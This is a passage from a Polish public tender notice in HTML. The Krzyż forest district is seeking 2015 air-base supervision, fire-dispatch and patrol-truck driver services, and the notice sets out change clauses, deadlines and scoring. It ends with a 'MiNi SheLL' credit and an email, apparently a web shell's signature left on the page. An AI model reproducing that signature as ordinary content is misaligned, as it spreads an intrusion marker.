- zmiany  uzasadnione  okolicznościami, o których  mowa w art. 357 1 k.c. z uwzględnieniem  faktu, że  za rażącą  zostanie uznana strata w wysokości, o  której mowa w art. 397 Ksh.

Zmiana umowy nastąpić może z inicjatywy Zamawiającego albo Wykonawcy poprzez przedstawienie drugiej stronie propozycji zmian w formie pisemnej, które powinny zawierać: 

opis zmiany,
uzasadnienie zmiany,
koszt zmiany oraz jego wpływ na wysokość wynagrodzenia,
czas wykonania zmiany oraz wpływ zmiany na termin zakończenia umowy.

Nie stanowi istotnej zmiany umowy w rozumieniu art. 144 Pzp, w szczególności:
- zmiana danych związanych z obsługą administracyjno - organizacyjna umowy np. zmiana rachunku bankowego, zmiana dokumentów potwierdzających uregulowanie płatności wobec podwykonawców,
- zmiana danych teleadresowych oraz osób wskazanych do kontaktów między stronami.

Zamawiający dopuszcza możliwość zmiany istotnych postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w przypadku wprowadzenia w życie, po podpisaniu umowy, regulacji prawnych wywołujących potrzebę zmiany umowy wraz ze skutkami wprowadzenia takiej zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.lasy.gov.pl/pl/bip/dg/rdlp_pila/nadl_krzyz<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Łokacz Mały, ul. Adama Mickiewicza 1, 64-761 Krzyż Wlkp., pokój nr 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.02.2015 godzina 10:00, miejsce: Łokacz Mały, ul. Adama Mickiewicza 1, 64-761 Krzyż Wlkp..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Usługa związana z obsługą i nadzorem bazy lotniczej Herburtowo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa związana z całodobowym nadzorem bazy lotniczej Herburtowo, położonej w miejscowości Marianowo, 64-730 Wieleń..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.25.11.10-7, 75.25.11.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usługa związana z pełnieniem dyżurów przeciwpożarowych w punkcie alarmowo-dyspozycyjnym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonywanie dyżurów odbywać się będzie w punkcie alarmowo-dyspozycyjnym PAD w biurze Nadleśnictwa. Praca dyżurnego PAD pełniona będzie od dnia 16.03.2015 r. do 31.10.2015 r., od godziny 9.00 do godziny 21.00 w dni robocze i w dni wolne od pracy w tym także święta..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.25.11.10-4, 75.25.11.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Znajomość terenu Nadleśnictwa Krzyż - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Usługa związana z pełnieniem dyżurów jako kierowca - operator samochodu patrolowo - gaśniczego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonywanie dyżurów jako kierowca - operator samochodu patrolowo-gaśniczego odbywać się będzie w dwuosobowej obsadzie. Praca kierowcy i jego pomocnika pełniona będzie od dnia 16.03.2015 r., do 31.10.2015 r., od godziny 14.00 do godziny 21.00 w dni robocze i od godziny 9.00 do godziny 21.00 w dni wolne od pracy w tym również święta..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.25.11.10-4, 75.25.11.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Znajomość terenu Nadleśnictwa Krzyż - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com